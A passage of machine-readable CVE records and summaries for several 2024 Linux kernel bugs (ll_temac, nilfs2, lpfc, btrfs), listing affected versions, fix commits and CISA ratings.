"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.8.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ll_temac: platform_get_resource replaced by wrong function\n\nThe function platform_get_resource was replaced with\ndevm_platform_ioremap_resource_byname and is called using 0 as name.\n\nThis eventually ends up in platform_get_resource_byname in the call\nstack, where it causes a null pointer in strcmp.\n\n\tif (type == resource_type(r) \u0026\u0026 !strcmp(r-\u003ename, name))\n\nIt should have been replaced with devm_platform_ioremap_resource."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:46.667Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/6d9395ba7f85bdb7af0b93272e537484ecbeff48"
},
{
"url": "https://git.kernel.org/stable/c/553d294db94b5f139378022df480a9fb6c3ae39e"
},
{
"url": "https://git.kernel.org/stable/c/46efbdbc95a30951c2579caf97b6df2ee2b3bef3"
},
{
"url": "https://git.kernel.org/stable/c/476eed5f1c22034774902a980aa48dc4662cb39a"
},
{
"url": "https://git.kernel.org/stable/c/7e9edb569fd9f688d887e36db8170f6e22bafbc8"
},
{
"url": "https://git.kernel.org/stable/c/92c0c29f667870f17c0b764544bdf22ce0e886a1"
},
{
"url": "https://git.kernel.org/stable/c/3a38a829c8bc27d78552c28e582eb1d885d07d11"
}
],
"title": "net: ll_temac: platform_get_resource replaced by wrong function",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35796",
"datePublished": "2024-05-17T13:23:07.558Z",
"dateReserved": "2024-05-17T12:19:12.339Z",
"dateUpdated": "2025-05-04T12:55:46.667Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38582 (GCVE-0-2024-38582)
Vulnerability from cvelistv5
Published
2024-06-19 13:37
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nilfs2: fix potential hang in nilfs_detach_log_writer()
Syzbot has reported a potential hang in nilfs_detach_log_writer() called
during nilfs2 unmount.
Analysis revealed that this is because nilfs_segctor_sync(), which
synchronizes with the log writer thread, can be called after
nilfs_segctor_destroy() terminates that thread, as shown in the call trace
below:
nilfs_detach_log_writer
nilfs_segctor_destroy
nilfs_segctor_kill_thread --> Shut down log writer thread
flush_work
nilfs_iput_work_func
nilfs_dispose_list
iput
nilfs_evict_inode
nilfs_transaction_commit
nilfs_construct_segment (if inode needs sync)
nilfs_segctor_sync --> Attempt to synchronize with
log writer thread
*** DEADLOCK ***
Fix this issue by changing nilfs_segctor_sync() so that the log writer
thread returns normally without synchronizing after it terminates, and by
forcing tasks that are already waiting to complete once after the thread
terminates.
The skipped inode metadata flushout will then be processed together in the
subsequent cleanup work in nilfs_segctor_destroy().
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-38582",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-20T14:52:09.028015Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-08T18:41:35.298Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:35.321Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/911d38be151921a5d152bb55e81fd752384c6830"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bc9cee50a4a4ca23bdc49f75ea8242d8a2193b3b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eff7cdf890b02596b8d73e910bdbdd489175dbdb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/06afce714d87c7cd1dcfccbcd800c5c5d2cf1cfd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1c3844c5f4eac043954ebf6403fa9fd1f0e9c1c0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a8799662fed1f8747edae87a1937549288baca6a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6e5c8e8e024e147b834f56f2115aad241433679b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c516db6ab9eabbedbc430b4f93b0d8728e9b427f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eb85dace897c5986bc2f36b3c783c6abb8a4292e"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/nilfs2/segment.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "911d38be151921a5d152bb55e81fd752384c6830",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "bc9cee50a4a4ca23bdc49f75ea8242d8a2193b3b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "eff7cdf890b02596b8d73e910bdbdd489175dbdb",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "06afce714d87c7cd1dcfccbcd800c5c5d2cf1cfd",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1c3844c5f4eac043954ebf6403fa9fd1f0e9c1c0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a8799662fed1f8747edae87a1937549288baca6a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6e5c8e8e024e147b834f56f2115aad241433679b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "c516db6ab9eabbedbc430b4f93b0d8728e9b427f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "eb85dace897c5986bc2f36b3c783c6abb8a4292e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/nilfs2/segment.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: fix potential hang in nilfs_detach_log_writer()\n\nSyzbot has reported a potential hang in nilfs_detach_log_writer() called\nduring nilfs2 unmount.\n\nAnalysis revealed that this is because nilfs_segctor_sync(), which\nsynchronizes with the log writer thread, can be called after\nnilfs_segctor_destroy() terminates that thread, as shown in the call trace\nbelow:\n\nnilfs_detach_log_writer\n nilfs_segctor_destroy\n nilfs_segctor_kill_thread --\u003e Shut down log writer thread\n flush_work\n nilfs_iput_work_func\n nilfs_dispose_list\n iput\n nilfs_evict_inode\n nilfs_transaction_commit\n nilfs_construct_segment (if inode needs sync)\n nilfs_segctor_sync --\u003e Attempt to synchronize with\n log writer thread\n *** DEADLOCK ***\n\nFix this issue by changing nilfs_segctor_sync() so that the log writer\nthread returns normally without synchronizing after it terminates, and by\nforcing tasks that are already waiting to complete once after the thread\nterminates.\n\nThe skipped inode metadata flushout will then be processed together in the\nsubsequent cleanup work in nilfs_segctor_destroy()."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:14:36.500Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/911d38be151921a5d152bb55e81fd752384c6830"
},
{
"url": "https://git.kernel.org/stable/c/bc9cee50a4a4ca23bdc49f75ea8242d8a2193b3b"
},
{
"url": "https://git.kernel.org/stable/c/eff7cdf890b02596b8d73e910bdbdd489175dbdb"
},
{
"url": "https://git.kernel.org/stable/c/06afce714d87c7cd1dcfccbcd800c5c5d2cf1cfd"
},
{
"url": "https://git.kernel.org/stable/c/1c3844c5f4eac043954ebf6403fa9fd1f0e9c1c0"
},
{
"url": "https://git.kernel.org/stable/c/a8799662fed1f8747edae87a1937549288baca6a"
},
{
"url": "https://git.kernel.org/stable/c/6e5c8e8e024e147b834f56f2115aad241433679b"
},
{
"url": "https://git.kernel.org/stable/c/c516db6ab9eabbedbc430b4f93b0d8728e9b427f"
},
{
"url": "https://git.kernel.org/stable/c/eb85dace897c5986bc2f36b3c783c6abb8a4292e"
}
],
"title": "nilfs2: fix potential hang in nilfs_detach_log_writer()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38582",
"datePublished": "2024-06-19T13:37:39.163Z",
"dateReserved": "2024-06-18T19:36:34.928Z",
"dateUpdated": "2025-11-04T17:21:35.321Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-35930 (GCVE-0-2024-35930)
Vulnerability from cvelistv5
Published
2024-05-19 10:10
Modified
2025-05-21 09:12
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: lpfc: Fix possible memory leak in lpfc_rcv_padisc()
The call to lpfc_sli4_resume_rpi() in lpfc_rcv_padisc() may return an
unsuccessful status. In such cases, the elsiocb is not issued, the
completion is not called, and thus the elsiocb resource is leaked.
Check return value after calling lpfc_sli4_resume_rpi() and conditionally
release the elsiocb resource.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 6b5151fd7baec6812fece993ddd7a2cf9fd0125f Version: 6b5151fd7baec6812fece993ddd7a2cf9fd0125f Version: 6b5151fd7baec6812fece993ddd7a2cf9fd0125f Version: 6b5151fd7baec6812fece993ddd7a2cf9fd0125f Version: 6b5151fd7baec6812fece993ddd7a2cf9fd0125f Version: 6b5151fd7baec6812fece993ddd7a2cf9fd0125f Version: 6b5151fd7baec6812fece993ddd7a2cf9fd0125f Version: 6b5151fd7baec6812fece993ddd7a2cf9fd0125f |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35930",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T17:38:29.862018Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T17:40:55.711Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:49.028Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/edf82aa7e9eb864a09229392054d131b34a5c9e8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e2cd32435b1dff3d63759476a3abc878e02fb6c8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c473288f27d15014447de5a891bdf22a0695847a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7849e6f8410da96384e3d1f6b6d730f095142dc7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ee0b5f96b6d66a1e6698228dcb41df11ec7f352f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/07a2aa674fca679316b8ac51440adb895b53a7cf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3320126ed3afbc11934502319b340f91a4d61c8f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2ae917d4bcab80ab304b774d492e2fcd6c52c06b"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/scsi/lpfc/lpfc_nportdisc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "edf82aa7e9eb864a09229392054d131b34a5c9e8",
"status": "affected",
"version": "6b5151fd7baec6812fece993ddd7a2cf9fd0125f",
"versionType": "git"
},
{
"lessThan": "e2cd32435b1dff3d63759476a3abc878e02fb6c8",
"status": "affected",
"version": "6b5151fd7baec6812fece993ddd7a2cf9fd0125f",
"versionType": "git"
},
{
"lessThan": "c473288f27d15014447de5a891bdf22a0695847a",
"status": "affected",
"version": "6b5151fd7baec6812fece993ddd7a2cf9fd0125f",
"versionType": "git"
},
{
"lessThan": "7849e6f8410da96384e3d1f6b6d730f095142dc7",
"status": "affected",
"version": "6b5151fd7baec6812fece993ddd7a2cf9fd0125f",
"versionType": "git"
},
{
"lessThan": "ee0b5f96b6d66a1e6698228dcb41df11ec7f352f",
"status": "affected",
"version": "6b5151fd7baec6812fece993ddd7a2cf9fd0125f",
"versionType": "git"
},
{
"lessThan": "07a2aa674fca679316b8ac51440adb895b53a7cf",
"status": "affected",
"version": "6b5151fd7baec6812fece993ddd7a2cf9fd0125f",
"versionType": "git"
},
{
"lessThan": "3320126ed3afbc11934502319b340f91a4d61c8f",
"status": "affected",
"version": "6b5151fd7baec6812fece993ddd7a2cf9fd0125f",
"versionType": "git"
},
{
"lessThan": "2ae917d4bcab80ab304b774d492e2fcd6c52c06b",
"status": "affected",
"version": "6b5151fd7baec6812fece993ddd7a2cf9fd0125f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/scsi/lpfc/lpfc_nportdisc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.4"
},
{
"lessThan": "3.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.155",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.86",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.155",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.86",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.27",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.6",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: lpfc: Fix possible memory leak in lpfc_rcv_padisc()\n\nThe call to lpfc_sli4_resume_rpi() in lpfc_rcv_padisc() may return an\nunsuccessful status. In such cases, the elsiocb is not issued, the\ncompletion is not called, and thus the elsiocb resource is leaked.\n\nCheck return value after calling lpfc_sli4_resume_rpi() and conditionally\nrelease the elsiocb resource."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-21T09:12:38.106Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/edf82aa7e9eb864a09229392054d131b34a5c9e8"
},
{
"url": "https://git.kernel.org/stable/c/e2cd32435b1dff3d63759476a3abc878e02fb6c8"
},
{
"url": "https://git.kernel.org/stable/c/c473288f27d15014447de5a891bdf22a0695847a"
},
{
"url": "https://git.kernel.org/stable/c/7849e6f8410da96384e3d1f6b6d730f095142dc7"
},
{
"url": "https://git.kernel.org/stable/c/ee0b5f96b6d66a1e6698228dcb41df11ec7f352f"
},
{
"url": "https://git.kernel.org/stable/c/07a2aa674fca679316b8ac51440adb895b53a7cf"
},
{
"url": "https://git.kernel.org/stable/c/3320126ed3afbc11934502319b340f91a4d61c8f"
},
{
"url": "https://git.kernel.org/stable/c/2ae917d4bcab80ab304b774d492e2fcd6c52c06b"
}
],
"title": "scsi: lpfc: Fix possible memory leak in lpfc_rcv_padisc()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35930",
"datePublished": "2024-05-19T10:10:39.051Z",
"dateReserved": "2024-05-17T13:50:33.129Z",
"dateUpdated": "2025-05-21T09:12:38.106Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35936 (GCVE-0-2024-35936)
Vulnerability from cvelistv5
Published
2024-05-19 10:10
Modified
2025-05-04 09:08
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
btrfs: handle chunk tree lookup error in btrfs_relocate_sys_chunks()
The unhandled case in btrfs_relocate_sys_chunks() loop is a corruption,
as it could be caused only by two impossible conditions:
- at first the search key is set up to look for a chunk tree item, with
offset -1, this is an inexact search and the key->offset will contain
the correct offset upon a successful search, a valid chunk tree item
cannot have an offset -1
- after first successful search, the found_key corresponds to a chunk
item, the offset is decremented by 1 before the next loop, it's
impossible to find a chunk item there due to alignment and size
constraints
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35936",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T17:12:29.915009Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:33:57.902Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:49.118Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bebd9e0ff90034875c5dfe4bd514fd7055fc7a89"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/576164bd01bd795f8b09fb194b493103506b33c9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/87299cdaae757f3f41212146cfb5b3af416b8385"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d1ffa4ae2d591fdd40471074e79954ec45f147f7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/36c2a2863bc3896243eb724dc3fd4cf9aea633f2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0d23b34c68c46cd225b55868bc8a269e3134816d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1f9212cdbd005bc55f2b7422e7b560d9c02bd1da"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7411055db5ce64f836aaffd422396af0075fdc99"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/btrfs/volumes.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "bebd9e0ff90034875c5dfe4bd514fd7055fc7a89",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "576164bd01bd795f8b09fb194b493103506b33c9",
"status": "affected",
